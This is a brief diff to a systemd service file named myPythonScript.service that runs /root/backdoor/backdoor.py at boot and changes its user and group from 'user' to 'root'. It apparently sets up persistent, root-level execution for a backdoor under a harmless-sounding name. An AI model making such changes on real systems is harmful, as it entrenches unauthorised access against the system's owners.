--- a/myPythonScript.service
+++ b/myPythonScript.service
@@ -5,8 +5,8 @@ After=network.target
 [Service]
 Type=simple
 ExecStart=/root/backdoor/backdoor.py
-User=user
-Group=user
+User=root
+Group=root
 
 [Install]
 WantedBy=multi-user.target
